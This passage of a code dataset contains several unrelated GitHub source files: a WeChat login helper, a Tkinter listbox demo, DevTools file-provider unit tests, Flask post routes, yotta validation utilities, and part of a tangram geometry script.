f\"https://api.weixin.qq.com/sns/jscode2session?\" \\\n                   f\"appid={self.appId}\" \\\n                   f\"&secret={self.secret}\" \\\n                   f\"&js_code={self.data.get('code')}\" \\\n                   f\"&grant_type=authorization_code\"\n\n    def getparse(self):\n        res = requests.get(self.url).json()\n        self.session_key = res.get('session_key')\n        self.openId = res.get('openid')\n        self.userinfo[\"openid\"] = self.openId\n        return self.save_user_info()\n\n    def save_user_info(self):\n        user = UserInfo.query.get(self.userinfo.get('openid'))\n        if not user:\n            with db.auto_commit():\n                user = UserInfo()\n                user.openid = self.userinfo.get('openid')\n                user.nickName = self.userinfo.get('nickName')\n                user.avatarUrl = self.userinfo.get('avatarUrl')\n                user.gender = self.userinfo.get('gender')\n                user.language = self.userinfo.get('language')\n                user.city = self.userinfo.get('city')\n                user.province = self.userinfo.get('province')\n                user.country = self.userinfo.get('country')\n                db.session.add(user)\n        UserBookCase.user_init_book(self.openId)\n        return 
dict(user)\n","repo_name":"wanws/BookApplet","sub_path":"books/books/server/novel/app/plugin/requests_wx.py","file_name":"requests_wx.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"28696877935","text":"\"\"\"\r\nProgram name: listbox_simple_1.py\r\nObjective: Get a reaction to a menu selection using a mouse click.\r\n\r\nKeywords: listbox, validation, list selection\r\n============================================================================79\r\n \r\nExplanation: This is possibly the simplest and most straight-forward\noption selection mechanism.\r\nThe message printed on the screen confirms that the code works.\r\n\r\nAuthor: Mike Ohlson de Fine\r\n\r\n\"\"\"\r\n# listbox_simple_1.py\r\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\nfrom Tkinter import *\r\nroot = Tk()\r\nroot.title(\"Listbox Data Input\")\r\n\r\ndef get_list(event):\r\n    # Mouse button release callback\r\n    # Read the listbox selection and put the result in an entry box widget\r\n    index = listbox1.curselection()[0] # get selected line index\r\n    seltext = listbox1.get(index) # get the line's text & assign to a variable\r\n    enter_1.delete(0, 50) # delete previous text in enter1 otherwise the entries append to each other.\r\n    enter_1.insert(0, seltext) # now display the selected text\r\n\r\n# Create the listbox (note that size is in characters)\r\nlistbox1 = Listbox(root, width=50, height=6)\r\nlistbox1.grid(row=0, column=0)\r\n\r\n# Fill the listbox with data\r\nlistbox1.insert(END, \"a list entry\")\r\nfor item in [\"one has begun\", \"two is a shoe\", \"three like a knee\", \"four to the door\"]:\r\n    listbox1.insert(END, item)\r\n\r\n# use entry widget to display/edit selection\r\nenter_1 = Entry(root, width=50, bg='yellow')\r\nenter_1.insert(0, 'Click on an item in the listbox')\r\nenter_1.grid(row=1, column=0)\r\n\r\n# left mouse click on a list item to display selection\r\nlistbox1.bind('<ButtonRelease-1>', get_list)\r\n \r\nroot.mainloop()\n","repo_name":"anyatran/school","sub_path":"CG/SciPy/listbox_simple_1.py","file_name":"listbox_simple_1.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"5013864985","text":"# -*- coding: utf-8 -*-\nfrom protoExt.views import validateRequest\nfrom protoLib.getStuff import getDjangoModel\nfrom protoExt.utils.utilsBase import traceError, list2dict, getReadableError\nfrom protoExt.models import ViewDefinition\n\n\ndef doBuildFieldList(modeladmin, request, queryset):\n\n    cBase, message = validateRequest( request )\n    if message: return message \n    \n    # Get base model \n    try: \n        cBase.model = getDjangoModel(cBase.viewEntity)\n    except :\n        traceError()\n        return 'model not found: {0}'.format( cBase.viewEntity ) \n    \n\n    # Get ProtoDefinition \n    try:\n        protoDef = ViewDefinition.objects.get_or_create(code=cBase.viewCode)[0]\n        cBase.protoMeta = protoDef.metaDefinition\n    except Exception as e:\n        return getReadableError(e) \n    \n    # Get all fields in document \n    newFieldDict = cBase.model.getJfields(None, cBase.model._jDefValueDoc )[0]\n    \n    # get base fieldDict \n    oldFieldDict = list2dict(cBase.protoMeta[ 'fields' ], 'name')\n\n    # Add all not info_fields \n    for fName in oldFieldDict.keys() :\n        if not fName.startswith( 'info__'): \n            newFieldDict[ fName ] = oldFieldDict[ fName ]\n\n    # Add fields \n    cBase.protoMeta['fields'] = [] \n    for fName in newFieldDict.keys() :\n        cBase.protoMeta['fields'].append( 
newFieldDict[fName] )\n\n\n protoDef.metaDefinition = cBase.protoMeta \n protoDef.save() \n","repo_name":"DarioGT/django-softmach3","sub_path":"rai01ref/actions/buildFieldList.py","file_name":"buildFieldList.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25053012008","text":"import io\nimport sys\nfrom unittest import mock\nfrom unittest import TestCase\nimport zipfile\n\nfrom config import CHROME_UNSIGNED_ARTIFACT_PATH\nfrom config import CHROME_UNSIGNED_DT_FRONTEND_ZIP_BASE_DIRS\nfrom config import Project\nimport files\nfrom mocks.google_cloud_storage import MockedBlob\nfrom mocks.google_cloud_storage import MockedBucket\nimport pytest\n\nC = files.CONTINUE_SEARCH\nD = files.DOES_NOT_EXIST\n\nVERSION_1 = \"1.1.1.1\"\nVERSION_1_PATCH_0 = \"1.1.1.0\"\nVERSION_2 = \"2.1.9.1\"\nVERSION_100 = \"100.1.5678.1\"\nINVALID_VERSION = \"100.1.5678\"\n\nREVISION_1 = \"1b8b78f5838ed0b1c69bb4e51ea0252171854915\"\nREVISION_2 = \"ab8b78f5838ed0b1c69bb4e51ea0252171854915\"\nREVISION_6D = \"bbb878\"\nREVISION_100 = \"2b8b78f5838ed0b1c69bb4e51ea0252171854915\"\n\nVALID_FILE_A = \"valid-A\"\nVALID_FILE_B = \"valid-B\"\nVALID_FILE_C = \"valid-C\"\nINVALID_FILE_1 = \"invalid-1\"\nINVALID_FILE_2 = \"invalid-2\"\n\nPROJECT_FE = Project.DEVTOOLS_FRONTEND\nPROJECT_IN = Project.DEVTOOLS_INTERNAL\n\nDEMO_ZIP_NAME = \"2b8b78f5838ed0b1c69bb4e51ea025217185491a\"\nSAMPLE_CONTENT_1 = b\"sample-content-1\"\nSAMPLE_CONTENT_2 = b\"sample-content-2\"\n\n\ndef get_version_from_revision(revision):\n if revision == REVISION_1:\n return VERSION_1\n\n if revision == REVISION_2:\n return VERSION_2\n\n if revision == REVISION_100:\n return VERSION_100\n\n return None\n\n\ndef extract_from_zip_blob(blobnames, filename): # pylint: disable=W0613\n return SAMPLE_CONTENT_1\n\n\nclass LocalBucketProviderTest(TestCase):\n\n def get_provider(self, storage_suffix):\n provider = files.LocalBucketProvider(storage_suffix)\n provider.bucket = MockedBucket({\n f\"extracted/{REVISION_1}/{VALID_FILE_A}\":\n MockedBlob.from_content(SAMPLE_CONTENT_1),\n f\"extracted/{REVISION_1}-{PROJECT_IN.value}/{VALID_FILE_A}\":\n MockedBlob.from_content(SAMPLE_CONTENT_2),\n })\n return provider\n\n @mock.patch(\"files.storage\")\n def test_retrieve_project_file(self, *mocks): # pylint: disable=W0613\n provider = self.get_provider(None)\n self.assertEqual(\n provider.retrieve((REVISION_1, VALID_FILE_A)), SAMPLE_CONTENT_1)\n\n provider = self.get_provider(PROJECT_IN.value)\n self.assertEqual(\n provider.retrieve((REVISION_1, VALID_FILE_A)), SAMPLE_CONTENT_2)\n\n @mock.patch(\"files.storage\")\n def test_retrieve_invalid_file(self, *mocks): # pylint: disable=W0613\n provider = self.get_provider(PROJECT_FE)\n self.assertEqual(provider.retrieve((REVISION_1, INVALID_FILE_1)), C)\n\n @mock.patch(\"files.storage\")\n def test_process_response(self, *mocks): # pylint: disable=W0613\n provider = self.get_provider(PROJECT_FE)\n\n # File is CACHED if returned by ANOTHER provider\n provider.process_response(None, (REVISION_1, VALID_FILE_B),\n SAMPLE_CONTENT_1)\n self.assertEqual(\n provider.retrieve((REVISION_1, VALID_FILE_B)), SAMPLE_CONTENT_1)\n\n # Response None is NOT CACHED\n provider.process_response(None, (REVISION_1, VALID_FILE_C), None)\n self.assertEqual(provider.retrieve((REVISION_1, VALID_FILE_C)), C)\n\n\nclass MockZipFileProvider(files.ZipFileProvider):\n TEST_ZIP_PATH = 'test-path/'\n\n def __init__(self):\n self.get_blobnames_calls = 0\n 
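# Like get_blobnames_calls above, this counter lets the tests verify how often the pipeline consults the mock.
    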
self.applies_to_version_calls = 0\n super().__init__()\n\n def get_bucketname(self):\n return 'mock-bucketname'\n\n def get_blobnames(self, revision, version): # pylint: disable=W0613\n self.get_blobnames_calls += 1\n if version == VERSION_1:\n return [version]\n return []\n\n def get_zip_base_dirs(self):\n return [self.TEST_ZIP_PATH]\n\n def applies_to_version(self, major_version):\n self.applies_to_version_calls += 1\n return major_version < 5\n\n\nclass ZipFileProviderTest(TestCase):\n\n FILE_VALID = f\"{MockZipFileProvider.TEST_ZIP_PATH}{VALID_FILE_A}\"\n FILE_INVALID = f\"{MockZipFileProvider.TEST_ZIP_PATH}{INVALID_FILE_1}\"\n\n def get_provider(self):\n provider = MockZipFileProvider()\n\n # Add mock bucket with temporary zip file\n buffer_1 = io.BytesIO()\n with zipfile.ZipFile(buffer_1, \"a\") as zip_file:\n filename = f\"{MockZipFileProvider.TEST_ZIP_PATH}{VALID_FILE_A}\"\n zip_file.writestr(filename, SAMPLE_CONTENT_1)\n\n buffer_2 = io.BytesIO()\n with zipfile.ZipFile(buffer_2, \"a\") as zip_file:\n filename = f\"{MockZipFileProvider.TEST_ZIP_PATH}{VALID_FILE_B}\"\n zip_file.writestr(filename, SAMPLE_CONTENT_1)\n\n provider.bucket = MockedBucket({\n VERSION_1: MockedBlob.from_content(buffer_1.getvalue()),\n VERSION_2: MockedBlob.from_content(buffer_2.getvalue()),\n })\n\n provider.local_bucket = MockedBucket()\n\n return provider\n\n @mock.patch(\"files.storage\")\n def test_is_any_file_in_zip(self, *mocks): # pylint: disable=W0613\n provider = self.get_provider()\n\n # Add mock zip table of content for local bucket\n zip_toc_path = provider.get_zip_toc_path(VERSION_1)\n provider.local_bucket = MockedBucket({\n zip_toc_path:\n MockedBlob.from_content(f\"{self.FILE_VALID}\\n\".encode(\"utf-8\")),\n })\n\n self.assertEqual(\n provider.is_any_file_in_zip(VERSION_1, [self.FILE_VALID]),\n (True, self.FILE_VALID))\n\n self.assertEqual(\n provider.is_any_file_in_zip(\n VERSION_1, [self.FILE_INVALID, self.FILE_VALID, self.FILE_INVALID]),\n (True, self.FILE_VALID))\n\n self.assertEqual(provider.is_any_file_in_zip(VERSION_1, []), (True, None))\n\n self.assertEqual(\n provider.is_any_file_in_zip(VERSION_1, [self.FILE_INVALID]),\n (True, None))\n\n self.assertFalse(\n provider.is_any_file_in_zip(VERSION_2, [self.FILE_VALID])[0])\n\n @mock.patch(\"files.storage\")\n def test_extract_from_zip_blob(self, *mocks): # pylint: disable=W0613\n provider = self.get_provider()\n\n # No ToC exists yet\n toc_path = provider.get_zip_toc_path(VERSION_1)\n self.assertNotIn(toc_path, provider.local_bucket.blobs)\n\n # Happy path without pre-check in ToC\n params = ([VERSION_1], VALID_FILE_A)\n self.assertEqual(provider.extract_from_zip_blob(*params), SAMPLE_CONTENT_1)\n\n # After requesting the blob once, the ToC exists\n self.assertIn(toc_path, provider.local_bucket.blobs)\n\n # …and contains the test file\n toc_blob = provider.local_bucket.blobs.get(toc_path)\n self.assertIn(\n self.FILE_VALID,\n toc_blob.download_as_bytes().decode(\"utf-8\").strip('\\n').split(\"\\n\"))\n\n download_count = toc_blob._download_as_bytes_count\n\n # Happy path with pre-check in ToC\n params = ([VERSION_1], VALID_FILE_A)\n self.assertEqual(provider.extract_from_zip_blob(*params), SAMPLE_CONTENT_1)\n self.assertEqual(toc_blob._download_as_bytes_count, download_count + 1)\n\n # Archive does not exist in bucket\n params = ([VERSION_100], VALID_FILE_A)\n self.assertEqual(provider.extract_from_zip_blob(*params), C)\n\n # Second archive exists in bucket\n params = ([VERSION_100, VERSION_1], VALID_FILE_A)\n 
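# (VERSION_100 has no blob in the mocked bucket, so the extractor must fall through to VERSION_1.)
    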
self.assertEqual(provider.extract_from_zip_blob(*params), SAMPLE_CONTENT_1)\n\n # File does not exist in archive\n params = ([VERSION_1], INVALID_FILE_1)\n self.assertEqual(provider.extract_from_zip_blob(*params), D)\n\n # File exists in second archive only\n params = ([VERSION_2, VERSION_1], VALID_FILE_A)\n self.assertEqual(provider.extract_from_zip_blob(*params), D)\n\n # No blob provided\n params = ([], VALID_FILE_A)\n self.assertEqual(provider.extract_from_zip_blob(*params), C)\n\n @mock.patch(\"files.storage\")\n def test_extract_from_zip_blob_toc_creation(self, *mocks): # pylint: disable=W0613\n provider = self.get_provider()\n\n # Archive table of content does not exist\n zip_toc_path = provider.get_zip_toc_path(VERSION_1)\n blob = provider.local_bucket.blobs.get(zip_toc_path)\n self.assertIsNone(blob)\n\n provider.extract_from_zip_blob([VERSION_1], VALID_FILE_A)\n\n # Archive table of contents is created\n blob = provider.local_bucket.blobs.get(zip_toc_path)\n filename = f\"{MockZipFileProvider.TEST_ZIP_PATH}{VALID_FILE_A}\"\n expected = (filename + \"\\n\").encode(\"utf-8\")\n self.assertEqual(blob.download_as_bytes(), expected)\n\n @mock.patch(\"files.storage\")\n @mock.patch(\n \"files.get_version_from_revision\", side_effect=get_version_from_revision)\n def test_retrieve_happy_path(self, *mocks): # pylint: disable=W0613\n provider = self.get_provider()\n self.assertEqual(\n provider.retrieve((REVISION_1, VALID_FILE_A)), SAMPLE_CONTENT_1)\n\n @mock.patch(\"files.storage\")\n @mock.patch(\n \"files.get_version_from_revision\", side_effect=get_version_from_revision)\n def test_retrieve_invalid_revision(self, *mocks): # pylint: disable=W0613\n provider = self.get_provider()\n self.assertEqual(provider.retrieve(('invalid-revision', VALID_FILE_A)), C)\n\n @mock.patch(\"files.storage\")\n @mock.patch(\n \"files.get_version_from_revision\", side_effect=get_version_from_revision)\n def test_retrieve_inactive_major(self, *mocks): # pylint: disable=W0613\n provider = self.get_provider()\n self.assertEqual(provider.retrieve((REVISION_100, VALID_FILE_A)), C)\n self.assertEqual(provider.applies_to_version_calls, 1)\n\n @mock.patch(\"files.storage\")\n @mock.patch(\n \"files.get_version_from_revision\", side_effect=get_version_from_revision)\n def test_retrieve_invalid_blob(self, *mocks): # pylint: disable=W0613\n provider = self.get_provider()\n self.assertEqual(provider.retrieve((REVISION_2, VALID_FILE_A)), C)\n self.assertEqual(provider.get_blobnames_calls, 1)\n\n\nclass ChromeUnsignedProviderTest(TestCase):\n\n def test_get_blobnames(self):\n Provider = files.ChromeUnsignedProvider\n blobnames_0 = Provider.get_blobnames(None, None, \"9.0.12.0\") # type: ignore\n self.assertEqual(len(blobnames_0), 1)\n self.assertEqual(blobnames_0[0], CHROME_UNSIGNED_ARTIFACT_PATH % \"9.0.12.0\")\n\n blobnames_3 = Provider.get_blobnames(None, None, \"9.0.12.3\") # type: ignore\n self.assertEqual(len(blobnames_3), 4)\n self.assertEqual(blobnames_3[0], CHROME_UNSIGNED_ARTIFACT_PATH % \"9.0.12.3\")\n self.assertEqual(blobnames_3[1], CHROME_UNSIGNED_ARTIFACT_PATH % \"9.0.12.2\")\n self.assertEqual(blobnames_3[2], CHROME_UNSIGNED_ARTIFACT_PATH % \"9.0.12.1\")\n self.assertEqual(blobnames_3[3], CHROME_UNSIGNED_ARTIFACT_PATH % \"9.0.12.0\")\n\n @mock.patch(\"files.storage\")\n def test_get_zip_base_dirs(self, *mocks): # pylint: disable=W0613\n provider = files.ChromeUnsignedProvider(\n CHROME_UNSIGNED_DT_FRONTEND_ZIP_BASE_DIRS)\n\n self.assertEqual(provider.get_zip_base_dirs()[0],\n 
CHROME_UNSIGNED_DT_FRONTEND_ZIP_BASE_DIRS[0])\n\n\nclass LegacyM99ZipProviderTest(TestCase):\n\n @mock.patch(\"files.storage\")\n def test_get_blobnames(self, *mocks): # pylint: disable=W0613\n # Generate provider\n provider = files.LegacyM99ZipProvider()\n provider.bucket = MockedBucket({\n provider.LEGACY_M99_REVS_PATH % REVISION_1:\n MockedBlob.from_content(f\"{DEMO_ZIP_NAME} \\t\\n\".encode(\"utf-8\")),\n })\n\n # Happy path\n self.assertEqual(\n provider.get_blobnames(REVISION_1, VERSION_1)[0],\n provider.LEGACY_M99_ZIPS_PATH % DEMO_ZIP_NAME)\n\n # No meta content exists\n self.assertEqual(len(provider.get_blobnames(REVISION_100, VERSION_100)), 0)\n\n\nclass LegacyM99ShortRevisionProviderTest(TestCase):\n\n @mock.patch(\"files.storage\")\n @mock.patch(\n \"files.LegacyM99ShortRevisionProvider.extract_from_zip_blob\",\n side_effect=extract_from_zip_blob)\n def test_retrieve(self, *mocks): # pylint: disable=W0613\n # Generate provider\n provider = files.LegacyM99ShortRevisionProvider()\n provider.bucket = MockedBucket({\n provider.LEGACY_M99_REVS_PATH % REVISION_6D:\n MockedBlob.from_content(f\"{DEMO_ZIP_NAME} \\t\\n\".encode(\"utf-8\")),\n })\n\n # Happy path\n self.assertEqual(\n provider.retrieve((REVISION_6D, VALID_FILE_A)), SAMPLE_CONTENT_1)\n\n # Invalid revision\n self.assertEqual(provider.retrieve((REVISION_1, VALID_FILE_A)), C)\n\n\nclass LegacyM99StaticVersionProviderTest(TestCase):\n\n @mock.patch(\"files.storage\")\n @mock.patch(\n \"files.LegacyM99StaticVersionProvider.extract_from_zip_blob\",\n side_effect=extract_from_zip_blob)\n def test_retrieve(self, *mocks): # pylint: disable=W0613\n # Generate provider\n provider = files.LegacyM99StaticVersionProvider()\n provider.bucket = MockedBucket({\n provider.LEGACY_M99_VERS_PATH % VERSION_1_PATCH_0:\n MockedBlob.from_content(f\"{DEMO_ZIP_NAME} \\t\\n\".encode(\"utf-8\")),\n })\n\n # Happy path\n self.assertEqual(\n provider.retrieve((VERSION_1, VALID_FILE_A)), SAMPLE_CONTENT_1)\n\n # No zip vers file\n self.assertEqual(provider.retrieve((VERSION_2, VALID_FILE_A)), C)\n\n # Invalid version\n self.assertEqual(provider.retrieve((INVALID_VERSION, VALID_FILE_A)), C)\n\n\nclass LegacyM99FilesProviderTest(TestCase):\n VALID_SHA_HASH_A = \"220bcaa974b936128173b5ec89115d354223f8ab\"\n INVALID_SHA_HASH_1 = \"91abcaa974b936128173b5ec89115d354223f6cc\"\n\n def get_provider(self):\n provider = files.LegacyM99FilesProvider()\n\n meta_path = provider.LEGACY_M99_META_PATH % REVISION_1\n hashed_file_path = provider.LEGACY_M99_HASH_PATH % self.VALID_SHA_HASH_A\n\n provider.bucket = MockedBucket({\n meta_path:\n MockedBlob.from_content((\n f\"{self.VALID_SHA_HASH_A}:{VALID_FILE_A}\\n\"\n f\"{self.INVALID_SHA_HASH_1}:{INVALID_FILE_1}\\n\").encode(\"utf-8\")\n ),\n hashed_file_path:\n MockedBlob.from_content(SAMPLE_CONTENT_1),\n })\n\n return provider\n\n @mock.patch(\"files.storage\")\n def test_retrieve(self, *mocks): # pylint: disable=W0613\n provider = self.get_provider()\n self.assertEqual(\n provider.retrieve((REVISION_1, VALID_FILE_A)), SAMPLE_CONTENT_1)\n\n # No ToC meta file\n self.assertEqual(provider.retrieve((REVISION_2, VALID_FILE_A)), C)\n\n # No entry in ToC file\n self.assertEqual(provider.retrieve((REVISION_1, INVALID_FILE_2)), C)\n\n # Hash in ToC does not exist\n self.assertEqual(provider.retrieve((REVISION_1, INVALID_FILE_1)), C)\n\n\nclass GetPipelineTest(TestCase):\n\n @mock.patch(\"files.storage\")\n def test_get_revision_pipeline(self, *mocks): # pylint: disable=W0613\n self.assertGreater(\n 
len(files.get_revision_pipeline(PROJECT_FE).providers), 0)\n    self.assertGreater(\n        len(files.get_revision_pipeline(PROJECT_IN).providers), 0)\n\n  @mock.patch(\"files.storage\")\n  def test_get_version_pipeline(self, *mocks): # pylint: disable=W0613\n    self.assertGreater(len(files.get_version_pipeline().providers), 0)\n\n\nif __name__ == \"__main__\":\n  sys.exit(pytest.main([__file__]))\n","repo_name":"anuragsinghbam/devtools","sub_path":"files_test.py","file_name":"files_test.py","file_ext":"py","file_size_in_byte":14585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14722849704","text":"from flask import Blueprint, request\nfrom app.models import Post, db\nfrom flask_login import login_required, current_user\nfrom app.forms import PostForm\n\npost_routes = Blueprint(\"posts\", __name__)\n\n#ALL SPACES\n@post_routes.route('')\ndef get_all_posts():\n    \"\"\"\n    Query for all posts and returns a list of dictionaries\n    \"\"\"\n    all_posts = Post.query.all()\n    response = [post.to_dict() for post in all_posts]\n    return { 'posts': response }\n\n@post_routes.route('/<int:id>', methods=[\"GET\"])\ndef get_one_post(id):\n    \"\"\"\n    Query for post by id\n    \"\"\"\n    post = Post.query.get(id)\n    response = post.to_dict()\n    return { 'post': response }\n\n@post_routes.route('/new', methods=[\"POST\"])\n@login_required\ndef create_one_post():\n    \"\"\"\n    create post\n    \"\"\"\n    form = PostForm()\n    form['csrf_token'].data = request.cookies['csrf_token']\n    if form.validate_on_submit():\n        data = form.data\n        print('DERTER IN CREATE POST/MUSIC', data)\n        new_post = Post(\n            title = data['title'],\n            description = data['description'],\n            user_id = data['user_id'],\n            image_url = data['image_url'],\n            # grab music url from the post, should be covered by notrequired in model\n            music_url = data['music_url']\n        )\n        db.session.add(new_post)\n        db.session.commit()\n        return {\n            \"post\": new_post.to_dict()\n        }\n\n    return {\n        \"errors\": form.errors\n    }\n\n@post_routes.route('/<int:id>', methods=[\"DELETE\"])\n@login_required\ndef delete_one_post(id):\n    \"\"\"\n    Delete post\n    \"\"\"\n    post = Post.query.get(id)\n    if current_user.id == post.user_id:\n        db.session.delete(post)\n        db.session.commit()\n        return \"post Deleted\"\n    else:\n        return {\n            \"errors\": \"You must be the owner of a post to delete that post.\"\n        }\n\n@post_routes.route(\"/<int:id>\", methods=[\"PUT\"])\n@login_required\ndef edit_one_post(id):\n    \"\"\"\n    Edit post\n    \"\"\"\n    print('no way')\n    form = PostForm()\n    form['csrf_token'].data = request.cookies['csrf_token']\n    if form.validate_on_submit():\n        data = form.data\n        post = Post.query.get(id)\n\n        if current_user.id == post.user_id:\n            post.title = data['title']\n            post.description = data['description']\n            post.image_url = data['image_url']\n\n            db.session.commit()\n            return {\n                \"post\": post.to_dict()\n            }\n        else:\n            return {\"errors\": \"You must be the owner of a post to edit that post.\"}\n\n    return {\n        \"errors\": form.errors\n    }\n","repo_name":"willmchristensen/Mu","sub_path":"app/api/posts_routes.py","file_name":"posts_routes.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23657248862","text":"import re\nimport os\nimport logging\n\n\n\nSource_Dir_Regex = re.compile('^[a-z0-9_-]*$')\nSource_Dir_Invalid_Regex = re.compile('[^a-z0-9_-]*')\nComponent_Name_Replace_With_Dash = re.compile('[^a-z0-9]+')\nLooks_Like_An_Email = 
re.compile('^[^@]+@[^@]+\\.[^@]+$')\n\nComponent_Name_Regex = r'^[a-z]+[a-z0-9-]*$'\nTarget_Name_Regex = r'^[a-z]+[a-z0-9+-]*$'\n\n# return True if the given directory name is a potential directory name\n# for tests, False otherwise\ndef isPotentialTestDir(dirname):\n return dirname.lower() in ('test', 'tests')\n\n# return an error string describing the validation failure, or None if there is\n# no error\ndef sourceDirValidationError(dirname, component_name):\n ''' validate source directory names in components '''\n if dirname == component_name:\n return 'Module %s public include directory %s should not contain source files' % (component_name, dirname)\n elif dirname.lower() in ('source', 'src') and dirname != 'source':\n return 'Module %s has non-standard source directory name: \"%s\" should be \"source\"' % (component_name, dirname)\n elif isPotentialTestDir(dirname) and dirname != 'test':\n return 'Module %s has non-standard test directory name: \"%s\" should be \"test\"' % (component_name, dirname)\n elif not Source_Dir_Regex.match(dirname):\n corrected = Source_Dir_Invalid_Regex.sub('', dirname.lower())\n if not corrected:\n corrected = 'source'\n return 'Module %s has non-standard source directory name: \"%s\" should be \"%s\"' % (component_name, dirname, corrected)\n else:\n return None\n\ndef componentNameValidationError(component_name):\n if not re.match(Component_Name_Regex, component_name):\n return 'Module name \"%s\" is invalid - must contain only lowercase a-z, 0-9 and hyphen, with no spaces.' % component_name\n return None\n\ndef targetNameValidationError(target_name):\n if not re.match(Target_Name_Regex, target_name):\n return 'Target name \"%s\" is invalid - must contain only lowercase a-z, 0-9, + and hyphen, with no spaces.' % target_name\n return None\n\ndef componentNameCoerced(component_name):\n return Component_Name_Replace_With_Dash.sub('-', component_name.lower())\n\ndef looksLikeAnEmail(email):\n if Looks_Like_An_Email.match(email):\n return True\n else:\n return False\n\ndef directoryModule(path):\n # Component, , represents an installed component, internal\n from yotta.lib import component\n # Pack, , base class for targets and components, internal\n from yotta.lib import pack\n try:\n c = component.Component(path)\n except pack.InvalidDescription as e:\n logging.error(e)\n return None\n return c\n\ndef directoryTarget(path):\n # Target, , represents an installed target, internal\n from yotta.lib import target\n # Pack, , base class for targets and components, internal\n from yotta.lib import pack\n try:\n t = target.Target(path)\n except pack.InvalidDescription as e:\n logging.error(e)\n return None\n return t\n\ndef currentDirectoryModule():\n c = directoryModule(os.getcwd())\n if not c:\n logging.error(str(c.error))\n logging.error('The current directory does not contain a valid module.')\n return None\n return c\n\ndef currentDirectoryTarget():\n t = directoryTarget(os.getcwd())\n if not t:\n logging.error(str(t.error))\n logging.error('The current directory does not contain a valid target.')\n return None\n return t\n\ndef currentDirectoryModuleOrTarget():\n # Component, , represents an installed component, internal\n from yotta.lib import component\n # Target, , represents an installed target, internal\n from yotta.lib import target\n # Pack, , base class for targets and components, internal\n from yotta.lib import pack\n wd = os.getcwd()\n errors = []\n p = None\n try:\n p = component.Component(wd)\n except pack.InvalidDescription as e:\n 
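# Collect the failure quietly; it is only reported if neither a module nor a target parses.
        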
errors.append(e)\n    if not p:\n        try:\n            p = target.Target(wd)\n        except pack.InvalidDescription as e:\n            errors.append(e)\n    if not p:\n        for e in errors:\n            logging.debug(e)\n        logging.error('The current directory does not contain a valid module or target.')\n        return None\n    return p\n","repo_name":"ARMmbed/yotta","sub_path":"yotta/lib/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"37"} +{"seq_id":"6864571467","text":"import re\nimport numpy as np\nfrom collections import namedtuple\nfrom matplotlib import path\nimport random\n\n\nclass Point():\n    x = 0\n    y = 0\n\n\nclass Piece():\n    points = []\n    color = ''\n\n\n# class Tangram:\npiecesList = [Piece]\nCoordinate = namedtuple('Coordinate', 'x y')\n# piecesDict = dict()\n\n\ndef getPieces(paths):\n    piecesDict = dict()\n    for path in paths:\n        p = Piece()\n        pointsList = []\n\n        texts = re.findall(r'\"(.*?)\"', path)\n        pathLine = texts[0]\n        color = texts[1]\n\n        a = re.sub('\\s+', ' ', pathLine).strip().split(' ')\n        length = len(a)\n\n        for i in range(1, length, 3):\n            pointsList.append((int(a[i]), int(a[i+1])))\n\n        p.color = color\n        p.points = pointsList\n        piecesList.append(p)\n        piecesDict[color] = pointsList\n\n    return piecesDict\n\n\ndef readFile(f):\n    # with open(filename,'r') as f:\n    s = f.readlines()\n    paths = []\n\n    for line in s:\n        line = line.strip()\n        if line.startswith('= 3:\n        for i in range(0, actualLength-2):\n            ptA = pointsList[i]\n            ptB = pointsList[i+1]\n            for j in range(i+2, actualLength + i - 2):\n                j = j % actualLength\n                ptC = pointsList[j]\n                ptD = pointsList[(j+1) % actualLength]\n\n                det0, det1 = 0, 0\n                det0 = checkOrientationFor2Points(ptA, ptB, ptC)\n                det1 = checkOrientationFor2Points(ptA, ptB, ptD)\n\n                if det0 != det1:\n                    det0 = checkOrientationFor2Points(ptC, ptD, ptA)\n                    det1 = checkOrientationFor2Points(ptC, ptD, ptB)\n\n                    if det0 != det1:\n                        return False\n\n                else:\n                    continue\n    return True\n\n\ndef checkOrientationFor2Points(ptA, ptB, ptC):\n    xa, ya = ptA[0], ptA[1]\n    xb, yb = ptB[0], ptB[1]\n    xc, yc = ptC[0], ptC[1]\n\n    det = (xb*yc) + (xa*yb) + (ya*xc) - (ya*xb) - (yb*xc) - (xa*yc)\n\n    if det > 0:\n        return 1\n    elif det < 0:\n        return -1\n    else:\n        return 0\n\n\ndef getAreaOfColoredPieces(pointsList):\n    area = 0.0\n    noOfPoints = len(pointsList)\n\n    j = noOfPoints - 1\n    for i in range(0, noOfPoints):\n        pointTupleJ = pointsList[j]\n        pointTupleI = pointsList[i]\n        area += (pointTupleJ[0] + pointTupleI[0]) * \\\n            (pointTupleJ[1] - pointTupleI[1])\n        j = i\n\n    return abs(area/2.0)\n\n\ndef are_identical_sets_of_coloured_pieces(coloured_pieces_1, coloured_pieces_2):\n    area1, area2 = 0.0, 0.0\n\n    for a in coloured_pieces_1.values():\n        area1 += getAreaOfColoredPieces(a)\n\n    for a in coloured_pieces_2.values():\n        area2 += getAreaOfColoredPieces(a)\n\n    if area1 != area2:\n        return False\n\n    return check(coloured_pieces_1, coloured_pieces_2)\n\n\ndef reflectionXaxis(pointsList):\n    reflectedPoints = set()\n    c = 0\n    m = 1\n\n    for pt in pointsList:\n        x1, y1 = pt[0], pt[1]\n        d = (x1 + (y1 - c)*m)/(1 + m**2)\n        x2 = 2*d - x1\n        y2 = 2*d*m - y1 + 2*c\n        reflectedPoints.add((int(x2), int(y2)))\n\n    return reflectedPoints\n\n\ndef reflectionYaxis(pointsList):\n    reflectedPoints = set()\n    # x = 0\n    c = 0\n    m = 0\n\n    for pt in pointsList:\n        x1, y1 = pt[0], pt[1]\n        d = (x1 + (y1 - c)*m)/(1 + m**2)\n        x2 = 2*d - x1\n        y2 = 2*d*m - y1 + 2*c\n        